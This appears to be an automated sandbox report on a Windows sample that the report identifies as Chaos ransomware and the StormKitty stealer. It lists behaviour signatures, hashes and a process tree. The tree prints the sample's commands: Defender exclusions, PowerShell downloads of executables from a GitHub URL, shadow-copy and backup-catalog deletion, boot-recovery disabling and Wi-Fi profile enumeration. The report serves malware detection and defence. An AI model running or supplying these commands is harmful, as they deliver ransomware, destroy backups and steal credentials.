Analysis

  • max time kernel
    106s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/03/2025, 02:34

General

  • Target

    568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe

  • Size

    57KB

  • MD5

    16edd47bf01716b24958a0b3a3a7bcfb

  • SHA1

    8b7972f4190c2ca9d600084611e966fa0f899b98

  • SHA256

    568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8

  • SHA512

    9e6ca1cbfa194aff3aebb60fa7b73ee4ff63f9770cfe1d114b757d55693278ccb8f6a450235255a3ae03ac382b528b899eb973d571523fe12e3910b9568d38e1

  • SSDEEP

    768:d5qkvPJg++TldUQJbxc1knPItshRGibgFfYTrTQc1mRdJcWvFM79yipBvSrrCeao:3rPJVKjbcknWSOYvTfkWkFM79yQVFu/

Malware Config

Signatures

  • Chaos

    Ransomware family first seen in June 2021.

  • Chaos Ransomware 2 IoCs
  • Chaos family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • Stormkitty family
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Drops desktop.ini file(s) 64 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 55 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe
    "C:\Users\Admin\AppData\Local\Temp\568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5516
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8211.tmp\8212.tmp\8222.bat C:\Users\Admin\AppData\Local\Temp\568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1720
      • C:\Windows\system32\net.exe
        net session
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:524
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          4⤵
            PID:3752
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2124
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"
          3⤵
          • Blocklisted process makes network request
          • Downloads MZ/PE file
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4328
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/kernelv.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\kernelv.exe\" -ErrorAction Stop"
          3⤵
          • Blocklisted process makes network request
          • Downloads MZ/PE file
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4260
        • C:\Users\Admin\AppData\Local\Temp\build.exe
          "C:\Users\Admin\AppData\Local\Temp\build.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1960
          • C:\Users\Admin\AppData\Roaming\svchost.exe
            "C:\Users\Admin\AppData\Roaming\svchost.exe"
            4⤵
            • Checks computer location settings
            • Drops startup file
            • Executes dropped EXE
            • Drops desktop.ini file(s)
            • Sets desktop wallpaper using registry
            • Modifies registry class
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1744
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3460
              • C:\Windows\system32\vssadmin.exe
                vssadmin delete shadows /all /quiet
                6⤵
                • Interacts with shadow copies
                PID:4064
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic shadowcopy delete
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:6108
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1436
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} bootstatuspolicy ignoreallfailures
                6⤵
                • Modifies boot configuration data using bcdedit
                PID:5520
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} recoveryenabled no
                6⤵
                • Modifies boot configuration data using bcdedit
                PID:5080
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:5952
              • C:\Windows\system32\wbadmin.exe
                wbadmin delete catalog -quiet
                6⤵
                • Deletes backup catalog
                PID:4824
            • C:\Windows\system32\NOTEPAD.EXE
              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\readme.txt
              5⤵
              • Opens file in notepad (likely ransom note)
              PID:3092
        • C:\Users\Admin\AppData\Local\Temp\kernelv.exe
          "C:\Users\Admin\AppData\Local\Temp\kernelv.exe"
          3⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          • outlook_office_path
          • outlook_win_path
          PID:4932
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
            4⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Wi-Fi Discovery
            • Suspicious use of WriteProcessMemory
            PID:5064
            • C:\Windows\SysWOW64\chcp.com
              chcp 65001
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3728
            • C:\Windows\SysWOW64\netsh.exe
              netsh wlan show profile
              5⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:6080
            • C:\Windows\SysWOW64\findstr.exe
              findstr All
              5⤵
              • System Location Discovery: System Language Discovery
              PID:6028
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4932 -s 2456
            4⤵
            • Program crash
            PID:3044
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2988
            • C:\Windows\SysWOW64\chcp.com
              chcp 65001
              5⤵
              • System Location Discovery: System Language Discovery
              PID:5460
            • C:\Windows\SysWOW64\netsh.exe
              netsh wlan show networks mode=bssid
              5⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:5112
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          3⤵
          • Hide Artifacts: Ignore Process Interrupts
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:844
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4932 -ip 4932
      1⤵
        PID:5900
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4628
      • C:\Windows\system32\wbengine.exe
        "C:\Windows\system32\wbengine.exe"
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4584
      • C:\Windows\System32\vdsldr.exe
        C:\Windows\System32\vdsldr.exe -Embedding
        1⤵
          PID:4792
        • C:\Windows\System32\vds.exe
          C:\Windows\System32\vds.exe
          1⤵
          • Checks SCSI registry key(s)
          PID:4868

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\2012_x64_1_vcRuntimeAdditional_x64.log

          Filesize

          1B

          MD5

          d1457b72c3fb323a2671125aef3eab5d

          SHA1

          5bab61eb53176449e25c2c82f172b82cb13ffb9d

          SHA256

          8a8de823d5ed3e12746a62ef169bcf372be0ca44f0a1236abc35df05d96928e1

          SHA512

          ca63c07ad35d8c9fb0c92d6146759b122d4ec5d3f67ebe2f30ddb69f9e6c9fd3bf31a5e408b08f1d4d9cd68120cced9e57f010bef3cde97653fed5470da7d1a0

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\build.exe.log

          Filesize

          226B

          MD5

          28d7fcc2b910da5e67ebb99451a5f598

          SHA1

          a5bf77a53eda1208f4f37d09d82da0b9915a6747

          SHA256

          2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c

          SHA512

          2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          b7e1db446e63a2aae76cd85440a08856

          SHA1

          c900cc81335dd3ca6337e21f5bcde80f8e8a88f3

          SHA256

          7305bcde3ba246a9b5c1666079c61596cc2ed2c651a1cd9e20557dba8a78c0e4

          SHA512

          dd63e28017eec632868489e469dd2ba54f20a3024be44550b729a0384bd55c5aa78171f7416612cd5174047afc544e21678ca164359962312b1d853c9bff04ea

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          fab4db55b120bdb8f039cbf0cbb9b699

          SHA1

          a27372a4f86a5b8e51b659dcd616514eb10ad905

          SHA256

          47480518ed97ca484d21f125901d5d123a1da236d28a1c4afd7bb052f54abcf5

          SHA512

          7ecfad64b3f9cc8a29e092d39eda8225a95e9861f83e6b1b522fb537386d4d4a8fcbd1dc9946f3075149541b225487817a60847a7e5ef18b77a4bc27145b5fa4

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          2419d068e09423d5e7edec9bb8010870

          SHA1

          445b4a6ebefa37ee91ff5a18a3b8e6ae6af40fba

          SHA256

          d308e6cb382517e03b6773d345b2e68e57fe80ce636901ab95da87ba29d6c0ac

          SHA512

          053cb92ad73f842f22200dd39082a22474277816b1de63a722b881225218849e1d5038fe3caec8f2067c5e6ab593917d1ad7278038c154077e7e2b14d72f3264

        • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Firefox\FirefoxBookmarks.txt

          Filesize

          81B

          MD5

          ea511fc534efd031f852fcf490b76104

          SHA1

          573e5fa397bc953df5422abbeb1a52bf94f7cf00

          SHA256

          e5fe7f327ae62df007bd1117aa7f522dbbcd371ec67953f66d786424cb1d7995

          SHA512

          f7d8e575a2332b0fbd491b5e092b7ed6b0942a5165557fcc5d215d873b05103aa6ba01843133871c1c7ac81b10182a15895be49885c98d1a379dd55f88004fae

        • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt

          Filesize

          720B

          MD5

          f1ec936a604843f00159d2d32faf0435

          SHA1

          c33fe32522a1ed0dd97f9d6da5a9e5a2965e9774

          SHA256

          bdcbff15bfd70cb1d749842819845bf9ef5e3d17559c9be900a1f1b0ed11efbd

          SHA512

          74c2c40b451ccdbb0c66900a9e5eb6189bcc29452b8649125317108375cc53f572e15a27487b05288930957c00eb96d72fd8164e98d2406bb4282f118b49cb43

        • C:\Users\Admin\AppData\Local\Temp\8211.tmp\8212.tmp\8222.bat

          Filesize

          2KB

          MD5

          1c935ef28fdfd394b770d945d7f04d76

          SHA1

          29e251c3c40ce4ad1b2984bf26b444aa045d9b21

          SHA256

          aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681

          SHA512

          a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_usljgxxx.gvv.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\build.exe

          Filesize

          137KB

          MD5

          7605fb5c749eeea0b1b27fdaad78051c

          SHA1

          28388bf016af085bbcbacf8c516853942f6ec8d3

          SHA256

          466a92e378a95752870abddd6af278fba89c5fef2cb3adfe2c4c114b9bd7cd93

          SHA512

          1a3780652e092bd0be5c45cf034b2d0737324009c4d7d74e5cca193f75f285be85fa1631a68c6955566206dc3d51ba2dab9c4acfc74f9652ed2c04976ae3ee54

        • C:\Users\Admin\AppData\Local\Temp\kernelv.exe

          Filesize

          211KB

          MD5

          b6054dbe4ed853c2e35291f045a632ba

          SHA1

          1355fbe1ea1f6bb566921f04512f78590c4b0e41

          SHA256

          b58d783278e142a6242ff79712a1af504098c9a930271419bbf381caf45e29c4

          SHA512

          648e714669a3434c68091e23c2921f1b535fff0c43402ea57b8c3903282ea885c43f57746772a23674abaf80885aa52b99ece38663f4c0200a9ee9823a752da0

        • C:\Users\Admin\readme.txt

          Filesize

          780B

          MD5

          60d646f40556d78166ad8111d850fc51

          SHA1

          babaaf0762000dbf4b3f7a93beb35b6d9279d94d

          SHA256

          a66f43f9660c0b16c59eb22b1037c19af06f89d875344446cc63e90437f78fab

          SHA512

          3fb8acd626a012402669e42e760dd5b0efe2d2a37f3e71310c4a80a14491ee973713fcb0d90f99d40f0749c1dd16e8153afcb757e25de34c9ec9c82a58e81bc6

        • memory/1960-48-0x0000000000BF0000-0x0000000000C18000-memory.dmp

          Filesize

          160KB

        • memory/2124-18-0x000001DD40120000-0x000001DD4033C000-memory.dmp

          Filesize

          2.1MB

        • memory/2124-19-0x00007FF8D8CB0000-0x00007FF8D9771000-memory.dmp

          Filesize

          10.8MB

        • memory/2124-3-0x00007FF8D8CB3000-0x00007FF8D8CB5000-memory.dmp

          Filesize

          8KB

        • memory/2124-13-0x000001DD40440000-0x000001DD40462000-memory.dmp

          Filesize

          136KB

        • memory/2124-14-0x00007FF8D8CB0000-0x00007FF8D9771000-memory.dmp

          Filesize

          10.8MB

        • memory/2124-15-0x00007FF8D8CB0000-0x00007FF8D9771000-memory.dmp

          Filesize

          10.8MB

        • memory/4932-70-0x0000000006940000-0x00000000069D2000-memory.dmp

          Filesize

          584KB

        • memory/4932-68-0x0000000005CD0000-0x00000000061FC000-memory.dmp

          Filesize

          5.2MB

        • memory/4932-69-0x0000000006830000-0x0000000006896000-memory.dmp

          Filesize

          408KB

        • memory/4932-67-0x0000000004D80000-0x0000000004F42000-memory.dmp

          Filesize

          1.8MB

        • memory/4932-64-0x0000000004B90000-0x0000000004BA2000-memory.dmp

          Filesize

          72KB

        • memory/4932-62-0x0000000000240000-0x000000000027C000-memory.dmp

          Filesize

          240KB

        • memory/5516-0-0x0000000140000000-0x0000000140028000-memory.dmp

          Filesize

          160KB

        • memory/5516-66-0x0000000140000000-0x0000000140028000-memory.dmp

          Filesize

          160KB